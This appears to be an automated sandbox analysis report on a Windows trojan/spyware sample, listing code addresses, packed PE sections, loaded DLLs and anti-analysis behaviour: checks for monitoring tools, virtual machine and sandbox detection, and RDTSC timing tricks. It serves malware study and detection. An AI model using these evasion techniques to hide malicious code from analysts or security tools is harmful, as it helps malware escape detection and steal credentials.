Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AAF228	0_2_00AAF228
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B5F231	0_2_00B5F231
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A7B238	0_2_00A7B238
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B1921F	0_2_00B1921F
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AFD273	0_2_00AFD273
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00ADB24F	0_2_00ADB24F
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B3925C	0_2_00B3925C
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A83250	0_2_00A83250
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AD538F	0_2_00AD538F
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B01392	0_2_00B01392
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B17393	0_2_00B17393
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A85390	0_2_00A85390
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B413F6	0_2_00B413F6
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B753E9	0_2_00B753E9
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00ADD3CA	0_2_00ADD3CA
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B0D3CC	0_2_00B0D3CC
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B633C8	0_2_00B633C8
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B7B3C8	0_2_00B7B3C8
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00ABF328	0_2_00ABF328
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AE7328	0_2_00AE7328
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A6D32F	0_2_00A6D32F
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B0B323	0_2_00B0B323
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B3F312	0_2_00B3F312
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A5D315	0_2_00A5D315
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B5D30F	0_2_00B5D30F
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B2B37C	0_2_00B2B37C
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B57364	0_2_00B57364
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00ABD373	0_2_00ABD373
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00ACF34F	0_2_00ACF34F
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AE334B	0_2_00AE334B
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AE9342	0_2_00AE9342
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B1135F	0_2_00B1135F
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B45493	0_2_00B45493
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B6949A	0_2_00B6949A
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AFF4E8	0_2_00AFF4E8
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AC74E0	0_2_00AC74E0
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AE14FF	0_2_00AE14FF
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AE54FA	0_2_00AE54FA
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AFB434	0_2_00AFB434
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B55416	0_2_00B55416
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B25474	0_2_00B25474
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AEF476	0_2_00AEF476
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AF744E	0_2_00AF744E
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AB144F	0_2_00AB144F
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B61453	0_2_00B61453
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A75440	0_2_00A75440
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AC3444	0_2_00AC3444
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AD35A7	0_2_00AD35A7
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B1B5A2	0_2_00B1B5A2
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A495B0	0_2_00A495B0
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A43580	0_2_00A43580
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B6D59E	0_2_00B6D59E
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A4B590	0_2_00A4B590
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B415F8	0_2_00B415F8
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00ACB5FC	0_2_00ACB5FC
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AAF5D4	0_2_00AAF5D4
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B5B539	0_2_00B5B539
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B39523	0_2_00B39523
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B03523	0_2_00B03523
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B5F519	0_2_00B5F519
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B6F51A	0_2_00B6F51A
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B19576	0_2_00B19576
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A7357B	0_2_00A7357B
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AE3570	0_2_00AE3570
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B51556	0_2_00B51556
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B6B551	0_2_00B6B551
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B13545	0_2_00B13545
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B15544	0_2_00B15544
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A5B55A	0_2_00A5B55A
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B576B8	0_2_00B576B8
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B096AC	0_2_00B096AC
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A8B680	0_2_00A8B680
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AD9685	0_2_00AD9685
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AEB69B	0_2_00AEB69B
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B5F6F1	0_2_00B5F6F1
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B336F5	0_2_00B336F5
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B3F6F8	0_2_00B3F6F8
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AAF6F0	0_2_00AAF6F0
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B3B6C3	0_2_00B3B6C3
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00ACD6DE	0_2_00ACD6DE
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B01630	0_2_00B01630
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AB7628	0_2_00AB7628
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AF362B	0_2_00AF362B
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AB3627	0_2_00AB3627
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B73639	0_2_00B73639
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AF561C	0_2_00AF561C
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B2F607	0_2_00B2F607
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B21675	0_2_00B21675
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00ADB67A	0_2_00ADB67A
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B0B66C	0_2_00B0B66C
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B5D653	0_2_00B5D653
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00D07639	0_2_00D07639
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B49644	0_2_00B49644
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00ABD7AD	0_2_00ABD7AD
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B037B6	0_2_00B037B6
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AED788	0_2_00AED788
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A8B790	0_2_00A8B790
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B477F7	0_2_00B477F7
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B377EF	0_2_00B377EF
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B0D7C4	0_2_00B0D7C4
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B5D7C3	0_2_00B5D7C3
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AB5726	0_2_00AB5726
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B1771D	0_2_00B1771D
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B1571E	0_2_00B1571E
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00A6F760	0_2_00A6F760
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B4F779	0_2_00B4F779
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AE7778	0_2_00AE7778
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AD177A	0_2_00AD177A
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00B5376C	0_2_00B5376C

Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: String function: 00A5A420 appears 110 times
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: String function: 00A4B380 appears 49 times

Source: CgmaT61.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: CgmaT61.exe

Static PE information: Section: mzhehwmc ZLIB complexity 0.9941881155740228

Source: CgmaT61.exe

Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/0@2/2

Source: C:\Users\user\Desktop\CgmaT61.exe

Code function: 0_2_00A78AC0 CoCreateInstance,

0_2_00A78AC0

Source: C:\Users\user\Desktop\CgmaT61.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: CgmaT61.exe, 00000000.00000003.960721352.0000000005D86000.00000004.00000800.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.960341323.0000000005DA7000.00000004.00000800.00020000.00000000.sdmp, CgmaT61.exe, 00000000.00000003.988172793.0000000005DC1000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: CgmaT61.exe	Virustotal: Detection: 66%
Source: CgmaT61.exe	ReversingLabs: Detection: 63%

Source: CgmaT61.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\CgmaT61.exe

File read: C:\Users\user\Desktop\CgmaT61.exe

Jump to behavior

Source: C:\Users\user\Desktop\CgmaT61.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: CgmaT61.exe

Static file information: File size 2067968 > 1048576

Source: CgmaT61.exe

Static PE information: Raw size of mzhehwmc is bigger than: 0x100000 < 0x196200

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\CgmaT61.exe

Unpacked PE file: 0.2.CgmaT61.exe.a40000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mzhehwmc:EW;roelxloa:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;mzhehwmc:EW;roelxloa:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: CgmaT61.exe

Static PE information: real checksum: 0x1fe9f5 should be: 0x1f9dcb

Source: CgmaT61.exe	Static PE information: section name:
Source: CgmaT61.exe	Static PE information: section name: .idata
Source: CgmaT61.exe	Static PE information: section name:
Source: CgmaT61.exe	Static PE information: section name: mzhehwmc
Source: CgmaT61.exe	Static PE information: section name: roelxloa
Source: CgmaT61.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AA63B5 push 55C609B2h; mov dword ptr [esp], edx	0_2_00AA6447
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00C14091 push esi; mov dword ptr [esp], 230188CCh	0_2_00C140D7
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00C14091 push ebx; mov dword ptr [esp], esi	0_2_00C14155
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00C14091 push edx; mov dword ptr [esp], 540277B3h	0_2_00C141A3
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00C14091 push edx; mov dword ptr [esp], 61067184h	0_2_00C141BF
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00C14091 push eax; mov dword ptr [esp], 2CA785C6h	0_2_00C141F5
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00C14091 push 11C89B2Bh; mov dword ptr [esp], edx	0_2_00C14242
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00C14091 push 751DA4C3h; mov dword ptr [esp], ebp	0_2_00C1424F
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00C14091 push ebx; mov dword ptr [esp], edi	0_2_00C142A5
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00C14091 push esi; mov dword ptr [esp], ebp	0_2_00C142B0
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00C14091 push 5488C779h; mov dword ptr [esp], ecx	0_2_00C142CC
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00C14091 push esi; mov dword ptr [esp], edx	0_2_00C1433B
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00C14091 push 5887BC52h; mov dword ptr [esp], edx	0_2_00C14348
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00C14091 push eax; mov dword ptr [esp], 004AF34Bh	0_2_00C143BD
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00C14091 push ebp; mov dword ptr [esp], eax	0_2_00C143D2
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00C14091 push edi; mov dword ptr [esp], eax	0_2_00C14492
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00C14091 push 7DDE48ECh; mov dword ptr [esp], edx	0_2_00C1450A
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00C14091 push esi; mov dword ptr [esp], 56054D79h	0_2_00C1461F
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00C14091 push edi; mov dword ptr [esp], 59AB23E2h	0_2_00C146CA
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00C14091 push edx; mov dword ptr [esp], 51B2D36Eh	0_2_00C146FB
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00C14091 push 677908B6h; mov dword ptr [esp], edx	0_2_00C147DC
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00C14091 push eax; mov dword ptr [esp], edx	0_2_00C147E2
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00C14091 push edi; mov dword ptr [esp], 3F5D79B5h	0_2_00C147E7
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00C14091 push ecx; mov dword ptr [esp], edx	0_2_00C14837
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00C14091 push 7C78671Fh; mov dword ptr [esp], edi	0_2_00C1486E
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00C14091 push 665A72B2h; mov dword ptr [esp], ebx	0_2_00C148C7
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00C14091 push eax; mov dword ptr [esp], ebp	0_2_00C148CB
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00C14091 push 0EA8E5FAh; mov dword ptr [esp], ebp	0_2_00C148D8
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00C14091 push ecx; mov dword ptr [esp], esp	0_2_00C14910
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00CA4048 push edx; mov dword ptr [esp], esi	0_2_00CA405C
Source: C:\Users\user\Desktop\CgmaT61.exe	Code function: 0_2_00AA2000 push ebx; mov dword ptr [esp], edx	0_2_00AA639A

Source: CgmaT61.exe	Static PE information: section name: entropy: 7.169833059547756
Source: CgmaT61.exe	Static PE information: section name: mzhehwmc entropy: 7.953537250716954

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\CgmaT61.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\CgmaT61.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\CgmaT61.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\CgmaT61.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\CgmaT61.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: AA62BE second address: AA62C4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: AA62C4 second address: AA62DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD32CC50BA3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: AA5B33 second address: AA5B3D instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD32D43E286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: AA5B3D second address: AA5B47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FD32CC50B96h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C18075 second address: C1807B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C202D1 second address: C202E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d jng 00007FD32CC50B96h 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C2043A second address: C2043F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C20B03 second address: C20B09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C20B09 second address: C20B28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FD32D43E295h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C238AC second address: C238B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C238B0 second address: C238DE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 jmp 00007FD32D43E28Bh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jng 00007FD32D43E290h 0x00000017 mov eax, dword ptr [eax] 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C238DE second address: C238E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C239D3 second address: C23A06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007FD32D43E28Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push ecx 0x00000012 push ebx 0x00000013 jmp 00007FD32D43E28Eh 0x00000018 pop ebx 0x00000019 pop ecx 0x0000001a mov eax, dword ptr [eax] 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 pop eax 0x00000022 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C23A06 second address: C23A0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C23A0A second address: C23A10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C23A10 second address: C23A15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C23A15 second address: C23A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push edi 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\CgmaT61.exe	RDTSC instruction interceptor: First address: C23B03 second address: C23B07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
